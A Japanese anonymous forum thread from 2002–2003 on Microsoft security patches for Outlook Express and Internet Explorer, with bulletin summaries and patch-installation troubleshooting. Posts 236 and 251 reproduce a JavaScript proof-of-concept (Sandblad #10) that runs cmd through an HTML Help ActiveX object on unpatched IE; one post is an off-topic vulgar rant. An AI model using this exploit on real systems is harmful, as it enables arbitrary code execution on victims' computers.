「MS02-058: Outlook Express の S/MIME 解析の未チェックのバッファによりシステムが侵害される(Q328676)」 詳細 この修正プログラムをインストールすることにより、 悪意のあるユーザーによる以下の攻撃を防ぐことができます。 (高) S/MIME コントロールの脆弱性を悪用し、 バッファのオーバーラン攻撃が行われる問題です。 対策が行われていないシステムがインターネットなどのネットワークを通じて 他のコンピュータと接続している場合、この問題を悪用した攻撃を 受けることがあります。この攻撃は、受動的攻撃という悪意のある ユーザーから送られた HTML 形式の電子メールからも攻撃を受ける 可能性があります。この攻撃は、ハッカーまたはクラッカーと呼ばれる 悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした悪意のある プログラムから行われることがあります。 この脆弱性を悪用されることにより、 以下のような実害を受ける事が考えられます。 ・ 実行する意図の無いアプリケーションが動作させられる可能性があります (ハードディスクのフォーマットやワームなど) ・ Outlook Express が異常停止する可能性があります
182 :
名無しさん@お腹いっぱい。 :02/10/11 09:36
Q328676をインストールしようとすると "この修正プログラムをインストールするにはInternetExplorer6.0が必要です。" って出てエラーになってしまいます。 使ってるのがIE6SP1だからでしょうか?
183 :
名無しさん@お腹いっぱい。 :02/10/11 09:46
>>182 WindowsXPSP1とInternet Explorer6SP1にはこの修正はすでに含まれてるので
パッチ不要。
I’m up to date on all service packs for my system. Do I need the patch?
The fix for this issue was included in Windows XP Service Pack 1, and in Internet Explorer 6.0 Service Pack 1. If you’ve installed either of these two service packs, you’re already protected against the vulnerability and don’t need the patch.
http://www.microsoft.com/technet/security/bulletin/MS02-058.asp
184 :
名無しさん@お腹いっぱい。 :02/10/11 10:31
おまえら真面目にやれよ!!! アニヲタの自覚あんのかよ!! ラムが基本なんだよ!すべてはここから始まるんだよ!! 原作を完読しれっ!!TVシリーズを10日で全部見ろっ!! 亜空間アルバイトの回やつるつるセッケンの回をキャプしろっ!!! 口付け宅急便の扉絵を涎と精液でドロドロにしろっ!!! 話 は そ れ か ら な ん だ よ !!! 他のキャラに走るのはラムが卒業できてからなんだよ!!! たとえ卒業できなくたって構やしねぇんだよっ!!! 原点なんだよ!!!伝説なんだよ!!!神話なんだよ!!! ラム語れねぇヤシが偉そうな口たたくんじゃねぇよっ!!! 卒業できねぇヤシが『本気ラム』なんだよっ!! もう一回言うぞっ!!! おまいら真面目にやれよっっっ!!!!
185 :
MS02-058 :02/10/11 13:08
187 :
名無しさん@お腹いっぱい。 :02/10/11 23:06
いい加減 江戸マックスとかのフリーのまともなメーラーに替えたら? なんでOEなんていつまでも使ってるわけ? マゾですか?
江戸マックス、そろそろ枯れてきて、いい塩梅 秀丸、枯れすぎた これもスバラスィ
>>187 馬鹿ですか? このスレタイトルの意味わかんないの?
edmaxもIEコンポーネント使用メーラーなんだけど。
IEコンポーネント、使わなきゃエエべ
191 :
名無しさん@お腹いっぱい。 :02/10/12 00:19
MS02-058 は激しくヤバいね。 これって、以前NimdaやBadtransの大流行を招いた 原因と同じじゃない? メールを受信しただけで感染させるウイルスとか出そてきそう。 今度こそ、OE使うのはきっぱりやめようね。
>>191 べつにぃ、、、OE SP1 ですが、何か?
193 :
名無しさん@お腹いっぱい。 :02/10/12 10:12
>>191 任意のコードの実行というところだけに反応してageるんじゃねーぞぼけ。
かなーり違う。
194 :
名無しさん@お腹いっぱい。 :02/10/12 10:43
OEヲタ必死だな
>>194 「OEヲタ」じゃないが、何か?
メインメーラーは別のものだが、OE 初心者ユーザーが
ゴロゴロいるんで、その対応のため動作確認のためだけに
入れているだけだ。(藁
OEは糞という奴はたくさんいるけど、じゃあ代わりに何を使えばいいんだ? という問いに的確に回答で切る奴は殆どいない。 IEコンポーネント未使用で完全に無料(ウザイ広告付加)で使える物列挙してみろよ。
198 :
名無しさん@お腹いっぱい。 :02/10/12 14:18
NIFTYのウェブメール。
電八はIEコンポーネント使ってないような気がする…。 初心者にはお薦めしないが(w
>>197 なんでも無料だと思ってる奴は馬鹿。そもそもOEだって無料というわけじゃないだろ。
201 :
名無しさん@お腹いっぱい。 :02/10/12 21:36
197は精神を病んでるな・・
ネスケ付属の奴とか。
まあ、理由も示さずに「OEは糞」と言ってる奴も多いわけだが。 相手を説得したいなら納得させる努力をしろよ。 そのためにはOEについて詳しく知る必要がある。 その点でこのスレッドは有用だと思う。
メールを見ただけで、ウィルスにやられるOEは糞。
>>206 かつてはね(今後もないという保証はないが…)。つーかアップデートしろよ(w
OEのおかげで儲かってます。今後ともセキュリティホールをよろしく。 トレンドマイクロ シマンテック
>>209 セキュリティーホールはウイルスだけじゃないんだが・・・・・・
211 :
名無しさん@お腹いっぱい。 :02/10/17 11:10
212 :
名無しさん@お腹いっぱい。 :02/10/17 11:17
ほす
215 :
名無しさん@お腹いっぱい。 :02/11/20 08:25
216 :
MS02-065 :02/11/21 11:11
MS02-065 に関する情報 「MS02-065: Microsoft Data Access Components のバッファ オーバーラン により、コードが実行される (Q329414)」に関する要約情報です。 セキュリティ情報の概要と修正プログラムの情報をご案内いたします。 概要 ==== この問題は、Microsoft Data Access Components (MDAC) に含まれる Remote Data Services (RDS) コンポーネントでの文字列の処理に含まれる 未チェックのバッファにより、不正なプログラムが実行される可能性が あります。 対象となる製品 ============== ・Microsoft Data Access Components (MDAC) 2.1 ・Microsoft Data Access Components (MDAC) 2.5 ・Microsoft Data Access Components (MDAC) 2.6 ・Internet Explorer 5.01 ・Internet Explorer 5.5 ・Internet Explorer 6 つづく
217 :
MS02-065 :02/11/21 11:11
218 :
MS02-066 IEの累積的修正プログラム(Q328970) :02/11/21 11:14
MS込んj
223 :
名無しさん@お腹いっぱい。 :02/11/21 14:44
MDなんたらってのはサーバー立てしてない奴は関係ないんでしょ?
224 :
名無しさん@お腹いっぱい。 :02/11/21 14:48
>>223 対策が行われていないシステムがインターネットなどのネットワークを通
じて他のコンピュータと接続している場合、この問題を悪用した攻撃を受
けることがあります。この攻撃は、受動的攻撃という悪意のあるユーザー
から送られた HTML 形式の電子メールからも攻撃を受ける可能性がありま
す。この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザー
や、ワームといった自動的な攻撃を目的とした悪意のあるプログラムから
行われることがあります。
・Internet Explorer に想定する実害
意図しないアプリケーションが動作させられる可能性があります。その結
果、ワームの感染、データの削除、トロイの木馬の実行などが考えられま
す。
225 :
名無しさん@お腹いっぱい。 :02/11/21 14:53
>>224 テムプファイル形式とは違うの?
今MDのやつインスト完了。
226 :
名無しさん@お腹いっぱい。 :02/11/21 16:36
228 :
bloom :02/11/21 16:41
229 :
名無しさん@お腹いっぱい。 :02/11/21 17:55
>>227 してみたけどやっぱり駄目ですた
仕様なのか…?
231 :
名無しさん@お腹いっぱい。 :02/11/21 18:45
>>230 いや、いまIE6SP1に当ててみたが「SP1が必要です」とは出なかった。
まずIEのバージョンがSP1か確認してそうでなかったらもう一度IE6SP1にする。
SP1の表示がなされていたらInternet Explorerの修復をしてみる。
それでもだめならIE6SP1の再インスコ。
うまくパッチが当たったらバージョン情報にはSP1; Q328970;と表示される。
232 :
名無しさん@お腹いっぱい。 :02/11/21 19:56
Win95の場合、MS02-065のパッチは諦めるしかないのでしょうか?
234 :
名無しさん@お腹いっぱい。 :02/11/21 20:55
>>231 亀レスですがありがとう
やっぱ再インスコですか・・・
ナローには10Mはつらい・・・( ´Д⊂ヽ
236 :
名無しさん@お腹いっぱい。 :02/11/22 00:55
if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:')"); setTimeout('run()',1000); } function run() { f("javascript:document.write('<object id=c1 classid=clsid:adb"+ "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+ "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+ "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+ "-00aa003b7a11><param name=Command value=Close></object>')"); f("javascript:c1.Click();c2.Click();"); close(); } </script> --------------------------- CUT HERE ---------------------------
>>237 W2kSP2/IE6SP1でヘルプ表示されただけなんだけど。。。。なんで??
c:/vulnerable.txtなんて無かったぞ。。
Windows Updateを使わずにインストールしたセキュティパッチは Windows Updateのインストール履歴には表示されませんよね? ヘルプ→バージョン情報では適用されていても表示されない 修正プログラムもあるみたいですし (MS02-XXX)の問題を修正する修正プログラム(QXXXXXX):適用済み みたいな感じで一覧表示できる機能はないものですかねえ。
>>241 俺のマシンにはQFECHECK.EXEつーのが入ってるけど入手経路は忘れた。MS御謹製な事は確実だが。
>>241 「アプリケーションの追加と削除」に全部出るだろ?
244 :
名無しさん@お腹いっぱい。 :02/11/27 20:55
パッチを無効にされる恐れあり
Windowsの深刻なセキュリティ・ホールを解説する
ほとんどのWindowsシステムが影響を受ける深刻なセキュリティ・ホールが公開
された。今回のコラムでは,このセキュリティ・ホールの詳細や対策方法について
解説したい。注意しなければならないのは,修正パッチを適用するだけでは万全
といえないことだ。パッチが“無効化”される恐れがある。万全の対策を施せない
間は,Internet Explorerなどの利用を中止することも考慮したい。それほどまでに
深刻なセキュリティ・ホールなのだ。
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021126/1/
245 :
名無しさん@お腹いっぱい。 :02/11/27 20:58
246 :
名無しさん@お腹いっぱい。 :02/11/27 22:33
IEを削除。心穏やかに暮らせます。
過去アップデートのデジタル証明書がそのまま上書き利用されるってわけね。 これは盲点だったなMS。見つけたときにはガクガクブルブルだっただろう。 対策機能としてKillBitとかいってるけど、これも名前からして なんか容易くフラグをいじられてしまいそうな感もある(w
248 :
名無しさん@お腹いっぱい。 :02/11/28 04:07
Operaってセキュリティホールないの?
249 :
名無しさん@お腹いっぱい。 :02/11/28 09:11
250 :
名無しさん@お腹いっぱい。 :02/11/28 11:00
251 :
名無しさん@お腹いっぱい。 :02/11/28 17:11
<script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad,
[email protected] prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
( ・_・)y─~~~ pcにメールを入れない hotmailかyahooを使う が、hotmailはメルアドしれたら見られる可能性大... urlにメアド入れて...( ・×・)y─~~~
256 :
名無しさん@お腹いっぱい。 :02/11/29 15:20
>>255 おい、ホトメはセキュリティ対策とってないんか?
258 :
名無しさん@お腹いっぱい。 :02/12/03 06:51
漏れら極悪非道のageブラザーズ! 今日もネタもないのにageてやるからな!  ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ∧_∧ ∧_∧ age (・∀・∩)(∩・∀・) age (つ 丿 ( ⊂) age ( ヽノ ヽ/ ) age し(_) (_)J
260 :
MS02-068 :02/12/05 10:19
「MS02-068: Internet Explorer 用の累積的な修正プログラム (324929) 」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068ov.asp 概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-066 : Internet Explorer 用の累積的な修正プログラム
(Q328970) で修正された問題に加えて、新たに 1つの問題を排除します。
対象となる製品
・ Microsoft Internet Explorer 5.5 Service Pack 2
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 6 Service Pack 1
Microsoft Internet Explorer 5.01 は、この問題の影響を受けません。
262 :
名無しさん@お腹いっぱい。 :02/12/06 11:15
>>261 こういう先祖帰りしたライブラリを見付けてくれるソフトってあるかな。
>>259 リンクに入れないよー。何度やってもクッキーOKにしても跳ね返される。
>>266 入れました。最近いかないのでクッキー常拒否&制限サイト設定してました。
制限サイト設定がだめだったみたい。このサイト異常に大量のクッキーほしがる
からなんかやなんだよねえ。スレ汚しスマソ。
>>259 あちら隠せばこちら隠せず、みたいな。M$勘弁してください…。
最近HDDに増えているのはパッチばかり
ひとつひきだしを閉めると 違うひきだしが飛び出る ・・・えんえんと続く 「誰か来てー!こっち押さえてるから そっち閉めてー!!」
270 :
MS02-068 :02/12/07 12:39
Internet Explorer 用の累積的な修正プログラム (324929) (MS02-068)
深刻度を「警告」から「緊急」に変更
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp 緊急 (Critical):
この脆弱性が悪用された場合、Code Red や Nimda のようなインターネット
ワームがユーザーの操作なしで蔓延する可能性があります。
重要 (Important):
この脆弱性が悪用された場合、ユーザーのデータの機密性、完全性または
アベイラビリティが侵害される可能性があります。または、処理中のリソースの
完全性またはアベイラビリティが侵害される可能性があります。
警告 (Moderate):
この脆弱性が悪用された場合、既定の構成、監査または悪用が困難であること
などの要素により、悪用される可能性は大幅に緩和されます。
注意 (Low):
この脆弱性の悪用は非常に困難です。または影響はわずかです。
272 :
名無しさん@お腹いっぱい。 :02/12/07 15:25
これ、前に当てたのを手直ししたからもういっぺん当てなおせってことなのか?
273 :
名無しさん@お腹いっぱい。 :02/12/07 15:35
324929を落としてみてもう一度当ててみたが、再起動要求がなかった。 ってことはすでに当たってたってことか。よくわからんな。
>>272-273 注意、修正プログラムが正しくインストールされたかどうか確認する方法 、
更新履歴を嫁。
277 :
名無しさん@お腹いっぱい。 :02/12/08 15:59
age
278 :
名無しさん@お腹いっぱい :02/12/09 05:48
Microsoft VM JDBC クラスの問題により、コードが実行される (Q329077) (MS02-052) は、Windows Update以外に、ダウンロードできないのでしょうか?
279 :
名無しさん@お腹いっぱい。 :02/12/09 05:50
レジストで、TSHOOT.TSHOOTCtrl.1 を検索してみて。 TSHOOT.TSHOOTCtrl.1 が ActiveX/COM {4B106874-DD36-11D0-8B44-00A024DD9EFF}を参照しているのが おかしいらしいが、、、(ウインドクター)。 もし、あったら、、、、ブルブル、、?
280 :
名無しさん@お腹いっぱい。 :02/12/09 08:43
282 :
名無しさん@お腹いっぱい。 :02/12/09 12:12
283 :
名無しさん@お腹いっぱい。 :02/12/10 08:17
age
285 :
名無しさん@お腹いっぱい。 :02/12/11 16:42
「Windowsの深刻なホール」対策で発生するトラブルを解決する
トラブル相次ぐMDAC 2.7へのアップグレード,「警告」への対処がOSによって異なる
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/ >ようやく正確な情報が出揃った「Windowsの深刻なホール」であるが,トラブル
>はまだ続いている。“完全な対策”であるはずの MDAC 2.7 へのアップグレー
>ドがきちんと 実施できないケースが頻発しているようだ。アップグレード時に
>警告が出た場合の適切な対処方法が,Windows 95/95SE/NT 4.0 と Windows
>2000などでは異なることが原因だ。アップグレードできずに頭を抱えているユー
>ザーは,今回のコラムを一読してほしい。併せて今回のコラムでは,深刻度が
>「緊急」に急きょ変更されたInternet Explorer(IE)のセキュリティ・ホー
>ルなどについても解説する。
286 :
名無しさん@お腹いっぱい。 :02/12/12 08:31
>>264 関係 Microsoft Baseline Security Analyzer v1.1
http://pcweb.mycom.co.jp/news/2002/12/09/10.html 使ってみた人いる?
>IE5.01以降がインストールされたWindows 2000およびWindows XP上で動作し、
>次に挙げるシステムやソフトウェアをチェックできる。
>・Windows NT4.0(SP4以降)/2000/XP
>・Internet Information Server 4.0/5.0
>・SQL Server 7.0/2000
>・Internet Explorer 5.01以降
>・Office 2000/XP
288 :
名無しさん@お腹いっぱい。 :02/12/12 16:04
810030 Microsoft VMセキュリティ問題の修正プログラム 5.1MB っていうのがWindows Updateで来てるね。現時点では詳細不明。 必要システム Windows XP、Windows Millennium Edition、Windows NT(R) 4.0 Windows 98 Second Edition、Windows 98、Windows 95
289 :
名無しさん@お腹いっぱい。 :02/12/12 16:11
290 :
名無しさん@お腹いっぱい。 :02/12/12 16:53
緊急と言われてもまったく落ちてこない、、、 直リンキボン
>>290 漏れも落ちてこない。
人柱になりたいのでなければ日本語情報が出てしばらくした頃にUpdate
すれば医院で内科医。
しばらく待ったら落ちてきました。
293 :
bloom :02/12/12 17:04
ルータでポート135番塞いでたら、インストールに失敗した(恥 それにしてもWindowsUpdate重いぞ。
>>290 痺れを切らして(5分待ち)途中でキャンセルしたらIE固まった。
正確には固まったというよりも、キャンセル処理が長い感じ。
これほんとに7分(ADSL8M実際は1.5Mくらい)で落ちるのか??
297 :
名無しさん@お腹いっぱい。 :02/12/12 18:13
×し昇格 ○昇格
299 :
名無しさん@お腹いっぱい。 :02/12/12 21:37
「MS02-070: SMB 署名の問題により、グループ ポリシーが変更される (309376)」 (329170) の誤りだ>M$ まぁた間違えてやんの(w
http://www.pivx.com/larholm/unpatched/ ここには載ってない様だから新た
な奴らか。
マイクロソフトは12月12日,Windows OSやInternet Explorer(IE)などに含まれるJava仮想マシン「Microsoft VM」に8種類のセキュリティ・ホールがあることを明らかにした。
1. COMオブジェクトにアクセスされるセキュリティ・ホール
2. Codebase を偽装される2種類のセキュリティ・ホール
3. ダウンロードするサイトを偽装されるセキュリティ・ホール
4. JDBC API に関するセキュリティ・ホール
5. セキュリティ・マネージャの設定を無視できるセキュリティ・ホール
6. User.dirに関するセキュリティ・ホール
7. Java オブジェクトのインスタンスを作成されるセキュリティ・ホール
302 :
名無しさん@お腹いっぱい。 :02/12/12 23:54
windows update のほうではまだDLできんみたいだな。
303 :
名無しさん@お腹いっぱい。 :02/12/13 00:26
やっとDLできた。疲れる。
Adminisutrator のユーザー名をそのままにしている香具師、 多いんだろう。 ユーザー名の変更ができるんだから、名前を NIMDA にしてもよい。
306 :
名無しさん@お腹いっぱい。 :02/12/14 17:10
× Adminisutrator ○ Administrator
307 :
MS02-066,MS02-068 :02/12/16 23:10
308 :
名無しさん@Emacs :02/12/17 18:30
itiou sure tigai jya naino?
>>308
310 :
名無しさん@お腹いっぱい。 :02/12/18 18:48
>>310 そこ、ええですねん。
>ファイルを添付する場合は、必ず本文で一言触れる。
あまり守られていないマナーですが、これって重要だったりしますねん。
313 :
名無しさん@お腹いっぱい。 :02/12/19 09:18
314 :
bloom :02/12/19 09:34
まさかhome版で64ビット用パッチ入れようとした人、居ないっすよね。 ちょっと初心者板で気になったんで。。。。。
>>316 少なくともこの板ではそんな人はいない! と信じたい・・・
あと10スレ後に質問来るかもしれんけど・・・
Windows Updateに上がってるから、普通はWindows Updateをすると思いたい…。
>>318 漏れもそう思う。
つか間違って64ビット用入れようとしたら警告とか出ないのかな。
そこまでMSも親切じゃねぇか・・・
>>318 "IEおすすめ設定" にすると使えなくなるんだよね。
321 :
名無しさん@お腹いっぱい。 :03/01/08 12:44
322 :
名無しさん@お腹いっぱい。 :03/01/08 12:46
古いネタだけど、もし64bit版放りこんで壊れたら700円請求できるんだよね?
(^^)
325 :
名無しさん@お腹いっぱい。 :03/01/21 15:03
327 :
名無しさん@お腹いっぱい。 :03/01/23 11:37
328 :
名無しさん@お腹いっぱい。 :03/01/27 22:21
329 :
名無しさん@お腹いっぱい。 :03/01/30 11:03
330 :
MS03-004 :03/02/06 08:28
MS03-004 Cumulative Patch for Internet Explorer (810847)
・Who should read this bulletin: Customers using Microsoft® Internet Explorer.
・Impact of vulnerability: Allow an attacker to execute commands on a user’s system.
・Maximum Severity Rating: Critical
・Recommendation: Customers should install the patch immediately.
・Affected Software:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
・End User Bulletin: An end user version of this bulletin is available at:
http://www.microsoft.com/security/security_bulletins/ms03-004.asp
332 :
MS03-004: Internet Explorer 用の累積的な修正プログラム (810847) :03/02/06 12:16
IEにまたもや「緊急」のセキュリティ・ホール,すぐにWindows Updateの利用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030206/1/ マイクロソフトは2月6日,Internet Explorer(IE)の新たなセキュリティ・ホールとその
パッチを公開した。セキュリティ・ホールを悪用されると,WebページやHTMLメールを 閲覧しただけで,ウイルスなどの悪意があるプログラムを送り込まれて実行させられ
る恐れがある。対策は「Windows Update」などを利用してパッチを適用すること。最大
深刻度は「緊急(Critical)」なので,Windowsユーザーは早急にパッチを適用する必要
がある。
333 :
MS03-004(Q810847) :03/02/06 12:42
334 :
名無しさん@お腹いっぱい。 :03/02/07 00:48
クロスドメインとクロスサイトって同じ意味?
335 :
MS03-004 :03/02/07 19:21
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004.asp 今回の更新内容
2003 年 1 月 20 日に Windows Update に誤って公開された
Windows NT 4.0 の修正プログラム候補についての 「お詫び」 を追記しました。
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。
Windows NT 4.0 の環境において、この修正プログラム候補をインストールされ
たお客様は、お手数ですが、2003 年 2 月 6 日に公開した本セキュリティ情報
より、 Internet Explorer 用の修正プログラムをダウンロードし、再適用を
お願いいたします。
お詫び : Windows NT 4.0 の環境において、2003 年 1 月 20 日に
修正プログラム候補が Windows Update に誤って公開されました。お客様には
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。この
修正プログラムをインストールされたお客様は、お手数ですが、2003 年 2 月
6 日に公開した本セキュリティ情報より、 Internet Explorer 用の
修正プログラムをダウンロードし、再適用をお願いいたします。なお、以前の
修正プログラムをインストールされた環境では、Windows Update に
本修正プログラムが表示されません。現在、正しく検出できるよう
Windows Update を改良しております。
336 :
名無しさん@お腹いっぱい。 :03/02/07 23:35
とあるメーカーからのメルマガを受信したんだけど、 受信トレイにあるそのメールを選択するとOEが固まり落ちます。 削除トレイに移動できなくてちょっと困ってます。。 ウィルスはチェックしたんだけど感染してないようす。 新手の嫌がらせか?
337 :
名無しさん@お腹いっぱい。 :03/02/08 01:59
OEがだめなら、どのメールソフトがいいの? なるべくOEと同じように使えるのがいいんだけど。
フリーでhotmailが使えるのがいい それさえ出来れば今すぐOEから変えるけど
>>339 本当?
最新パッチを当然あててるけど、OEは信用していない
普段はPDAでnPOP(メーラー)使ってヘッダ見て(場合によってはサーバーから削除して)からOEで受信しているけど
バスターを入れているのに神経質過ぎるか
バスター入れて常駐保護してんなら 洗面所で 「汚れが落ちない、落ちないの・・・どうして、どうして汚れがおちないのぉーーーーーっ」 って絶叫しながら延々3時間ぐらい手を洗ってるようなもん
342 :
名無しさん@お腹いっぱい。 :03/02/09 18:00
www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-004ov.asp >Internet Explorer 6 の修正プログラムは、Windows XP 環境にのみ適用可能です。 これってwin98&ie6.0にあてるパッチはなし?
343 :
名無しさん@お腹いっぱい。 :03/02/09 18:12
「Internet Explorer 6 Service Pack 1」でいいの?
346 :
名無しさん@お腹いっぱい。 :03/02/09 19:25
347 :
(。・_・。) :03/02/09 19:43
349 :
IE最新バージョン情報まとめ :03/02/10 08:40
351 :
w98&ie6.0.2600... :03/02/10 22:31
Internet Explorer 6 Service Pack 1 Internet Explorer 6 駄目だった、XPじゃねーだろヴォケって言われる 先にsp1入れろってこと?
352 :
名無しさん@お腹いっぱい。 :03/02/11 10:47
>>353 EdMaxは生のメッセージを保存しないから糞。
356 :
MS03-004追加情報 :03/02/13 18:41
>>356 のを当てたらバージョン情報にQ813951がついた。
昨日システムの復元(約10日前の状態に)をして、その後OE6を開いたら9/1〜復元直前のメールデータが消えてしまいました。 もしかしたら復元操作とは関係無いかもしれませんが、このようにある一定の期間のメールデータが消えてしまった方はいませんか? McAfeeのウイルススキャンの関係かとも思いましたが、メールのスキャン設定はしてませんでした。 なにかご存知の方アドバイスお願いします。
>>360 そういう時はバックアップとって再現テストしてくれたまえ。
365 :
MS03-004関連 :03/02/14 08:40
>>361 Win板から勧められてきました。
なんだ、たらいまわしか。
>>366 ここはセキュリティパッチ関連の報告スレみたいなもんだから
再現性があるかどうか確認してMSに文句いってくれ
369 :
名無しさん@お腹いっぱい。 :03/02/15 02:26
MS03-004 810487 問題で、MSN hotmail にログインできるように変更したようだ。 再修正パッチしないでも、うまく入れたZO。
>>369 MSN hotmail側で対応したってこと?
371 :
名無しさん@お腹いっぱい。 :03/02/18 11:01
373 :
名無しさん@お腹いっぱい。 :03/02/18 12:35
まさかとは思うが メッセンジャーにでも統合されるのか?
375 :
名無しさん@お腹いっぱい。 :03/02/21 12:32
>>375 なんつーか、誰かまともなOSの作り方を教えてあげて・・・(;´Д`)
377 :
名無しさん@お腹いっぱい。 :03/02/25 16:47
378 :
名無しさん@お腹いっぱい。 :03/02/26 09:32
379 :
名無しさん@お腹いっぱい。 :03/02/27 08:44
380 :
名無しさん@お腹いっぱい。 :03/02/28 12:26
381 :
名無しさん@お腹いっぱい。 :03/03/06 08:54
HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。 Hotmailはウィルスチェックをしているとはいうものの、 それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、 メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。 さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。 またアンチウィルスソフトもメール受信時のスキャンはPOP3のみでHotmailなどのWebメールに対しては行われないので、 この時点でアンチウィルスソフトを常駐させていても反応しない。 ただしアンチウィルスソフトが常駐している場合は、添付ファイルを開くときに反応する。 したがって、Hotmailがウィルススキャンをしているから大丈夫だと誤解して、アンチウィルスソフトを常駐させずに Outlook ExpressでHotmailを受信する設定にしている場合、ウィルスの添付ファイルは素通りしてくるので、 添付ファイルを開くと感染する。セキュリティホールがある場合には開かなくても感染する。
まとめ 1、HotmailはOutlook Expressで受信せずにブラウザで見に行く。 ブラウザもOperaやNetscape等のInternet Explorer以外のものが望ましい。 2、アンチウィルスソフトは必ず導入して常駐させておく。ウィルス定義ファイルは常に最新にしておく。 3、Internet Explorer・Outlook ExpressはWindowsUpdateで常に最新の状態にしておく。
383 :
bloom :03/03/06 09:12
>>381 > HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。
> Hotmailはウィルスチェックをしているとはいうものの、
> それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
> メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。
> さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
> そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。
知らなかった
Hotmailだけの為にOEを使い続けていたけど意味なかったのか
385 :
名無しさん@お腹いっぱい。 :03/03/07 13:03
>>384-385 テストウィルス"eicar"でテストしてみ。OEだとさっくり入ってくるよ。
でもブラウザでHotmailに行くと、添付ファイルをクリックした時に
「感染しています。どうしますか?」みたいなことを聞いてくる。
387 :
名無しさん@お腹いっぱい。 :03/03/07 17:53
>>381 アンチウィルスソフトって一旦受信したOEのフォルダは
スキャンから除外してるから、
Hotmail経由でOEのフォルダにウィルスが入ってても、
スキャンしたときでも発見されないよね。
んでローカルにウィルスがあるといろいろ危ないよね。
なんかの拍子にアンチウィルスソフトが常駐でなくなったときに
クリックでもしたら大変。
OEでHotmail使うのはやめよう。
388 :
名無しさん@お腹いっぱい。 :03/03/11 10:24
保守
390 :
名無しさん@お腹いっぱい。 :03/03/14 08:45
>>372 の不具合まだ修正されないのかなぁ。
長文のメール書いてるとOEが落ちるから、結構ショックだよね。
392 :
MS03-007 :03/03/18 08:23
393 :
名無しさん@お腹いっぱい。 :03/03/18 16:55
age
394 :
MS03-007 :03/03/19 17:23
396 :
名無しさん@お腹いっぱい。 :03/03/19 22:44
397 :
名無しさん@お腹いっぱい。 :03/03/20 10:47
400 :
名無しさん@お腹いっぱい。 :03/03/20 12:33
401 :
名無しさん@お腹いっぱい。 :03/03/20 17:32
403 :
名無しさん@お腹いっぱい。 :03/03/24 12:13
age
404 :
MS03-007 :03/03/26 08:08
406 :
MS03-010 :03/03/27 10:48
「MS03-010: RPC エンドポイント マッパーの問題により、サービス拒否の攻撃が実行される (331953)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-010ov.asp ○概要
この問題は、下記製品のリモート プロシージャ コール (RPC: Remote
Procedure Call) のエンドポイント マッパーに問題があり、サービス拒否の
攻撃を受ける可能性があります。その結果、悪意のあるユーザーにお客様の
コンピューター上のサービスを停止させられる可能性があります。
○対象となる製品
・Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP
407 :
名無しさん@お腹いっぱい。 :03/03/27 14:55
408 :
MS03-007 :03/03/27 17:24
409 :
名無しさん@お腹いっぱい。 :03/04/07 19:24
410 :
MS03-011 :03/04/10 11:40
411 :
名無しさん@お腹いっぱい。 :03/04/10 13:06
>>410 これ5MBもあるし、鯖が混んでるのか、なかなか落ちてこないね。
412 :
名無しさん@お腹いっぱい。 :03/04/16 10:07
413 :
名無しさん@お腹いっぱい。 :03/04/16 19:14
414 :
MS03-013 :03/04/17 08:18
415 :
名無しさん@お腹いっぱい。 :03/04/17 10:13
(^^)
417 :
名無しさん@お腹いっぱい。 :03/04/17 12:38
age
∧_∧ ( ^^ )< ぬるぽ(^^)
sage
420 :
名無しさん@お腹いっぱい。 :03/04/21 18:10
>>414 のセキュリティパッチいれるとXpのIE6が使い物にならないくらい遅くなるから注意。
アンインストールで元に戻った。
421 :
名無しさん@お腹いっぱい。 :03/04/21 19:20
422 :
